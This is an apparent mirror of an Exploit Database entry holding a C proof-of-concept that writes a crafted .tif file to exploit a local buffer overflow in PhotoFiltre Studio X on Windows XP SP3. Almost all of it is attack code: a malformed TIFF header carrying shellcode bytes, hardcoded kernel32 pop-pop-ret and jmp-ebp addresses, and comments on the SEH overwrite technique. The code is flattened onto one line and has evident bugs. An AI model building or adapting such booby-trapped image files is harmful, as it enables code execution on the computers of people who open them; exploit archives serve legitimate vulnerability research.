PhotoFiltre Studio X – ‘.tif’ Local Buffer Overflow

• Exploit Database
• 125 阅读

• 作者： fl0 fl0w
  日期： 2010-05-04
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12497/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140

  #include<stdio.h> #define fisier FILE #define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n) #define VER "10.3.0" #define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)" #define AUTHOR "[*]fl0 fl0w" typedef char i8; typedef short i16; typedef int i32; void gen_random(i8*,const int); void print(i8*); i32 mcpy(void*,const void*,i32); void fwi32(fisier*,i32); i32 filerr(fisier*); void error(void); void filebuild(); unsigned int getFsize(fisier*,i8*); i32 sizes[]={257,163,217,213,940,29}; typedef struct { /*Retcodes from MS Windows xp pro sp3 */ i32 popopret; i32 jmpbyte; i32 jmpEBP; }instr; i32 main() {filebuild(); printf("%s\n%s\n",POCNAME,AUTHOR); print("file done"); getchar(); } void filebuild() { /*The logic: overwrite seh handler with pop pop ret,overwrite next seh with jmp ebp,find the exact location ebp points to and write a jmp 0x40 bytes instr. Because there isn&apos;t space for shellcode I chose this jmp ebp option. And a egghunter wouldn&apos;t be the solution because u also need space for it. */ i8 tif1[]= { 0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x00, 0xFE, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD, 0x01, 0x00, 0x00, 0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB6, 0x01, 0x00, 0x00, 0x02, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03, 0x01, 0x03, 0x00, 0x83, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x0A, 0x01, 0xB6, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11, 0x01, 0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0x22, 0x01, 0x00, 0x00, 0x12, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x15, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x16, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x01, 0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x00, 0x00, 0x1A, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xDA, 0x02, 0x00, 0x00, 0x1B, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE2, 0x02, 0x00, 0x00, 0x1C, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x29, 0x01, 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x43, 0x43, 0xEB, 0x05, 0x8C, 0x08, 0xFC, 0x7F, 0x43, 0x55, 0x89, 0xE5, 0x83, 0xEC, 0x18, 0xC7, 0x45, 0xFC, 0x77, 0x7A, 0x83, 0x7C, 0xC7, 0x44, 0x24, 0x04, 0xD0, 0x03, 0x00, 0x00, 0xC7, 0x04, 0x24, 0x01, 0x0E, 0x00, 0x00, 0x8B, 0x45, 0xFC, 0xFF, 0xD0, 0xC9,0xC3, }; i8 tif2[]= { 0x92, 0x00, 0x92, 0x00, 0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x00, 0x00, 0x92, 0x00, 0x49, 0x00, 0x12, 0x00, 0x92, 0x00, 0xAF, 0x00, 0x92, 0x00, 0x49, 0x00, 0x49, 0x00, 0x49, 0x00, 0x58, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x58, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x57, 0x00, 0x12, 0x00, 0x5A, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x12, 0x00, 0x00, 0x00, 0x46, 0x00, 0xFD, 0x00, 0xD5, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xEF, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x00, 0x00, 0x70, 0x00, 0x6C, 0x00, 0xFA, 0x00, 0x99, 0x00, 0xC5, 0x00, 0xF7, 0x00, 0xB4, 0x00, 0x48, 0x00, 0xAB, 0x00, 0xE9, 0x00, 0xDE, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xD7, 0x00, 0x64, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x6E, 0x00, 0x68, 0x00, 0x70, 0x00, 0x92, 0x00, 0xCC, 0x00, 0xF2, 0x00, 0x99, 0x00, 0x94, 0x00, 0xE9, 0x00, 0xAD, 0x00, 0xB4, 0x00, 0x4B, 0x00, 0xC9, 0x00, 0x85, 0x00, 0xE9, 0x00, 0xE5, 0x00, 0xB4, 0x00, 0x80, 0x00, 0x98, 0x00, 0x8C, 0x00, 0xE0, 0x00, 0xC4, 0x00, 0x33, }; /* tif1sz=v[1] tif2sz[]=v[2] sehoffset=v[3] nsehoffset=v[4] junksz=v[5] jmpebpoffset=v[6] */ fisier* in=fopen("exploit.in","r"), * out=fopen("exploit.tif","wb"); //i8 buf=ALOC(i8,100001); i8 buf[100001]; instr* ASM; ASM=ALOC(instr,sizeof(instr)); ASM->popopret=0x7C86CFC2;//pop esi pop edi ret from kernel32.dll ASM->jmpbyte=0xeb400300;//jmp over(u need to cause a exception NOT a exit call,so work on the instr) ASM->jmpEBP=0x7C81ACD3;//JMP EBP from kernel32.dll memcpy(tif1+217,&ASM->popopret,4); memcpy(tif1+213,&ASM->jmpEBP,4); memcpy(tif1+29,&ASM->jmpbyte,4); if(out){ fwrite(tif1,sizeof(i8),sizeof(tif1),out); gen_random(&buf,940); fwrite(&buf,sizeof(i8),940,out); fwrite(tif2,sizeof(i8),sizeof(tif2),out); fclose(out); free(buf); } else { error(); }   } void error(void) { perror("\nError:"); } i32 filerr(fisier* F) { return (ferror(F)); } void readf(void) {   } void fwi32(fisier* F,i32 adr) { fputc(adr&0xff,F); fputc((adr>>8)&0xff,F); fputc((adr>>16)&0xff,F); fputc((adr>>24)&0xff,F); } i32 mcpy(void* dest,const void* source,i32 len) { void* D=dest; const void* S=source; len=sizeof(source); memcpy(D,S,len); return (len); } void print(i8* msg) { printf("[*]%s\n",msg); } void gen_random(i8* s,const int len) { i32 i; static const i8 alphanum[]= { "0123456789ABCDEFGHIJKLMNOPQRST" "UVWXYZabcdefghijklmnopqrstuvwxyz"}; for(i=1;i<len;++i) { s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; }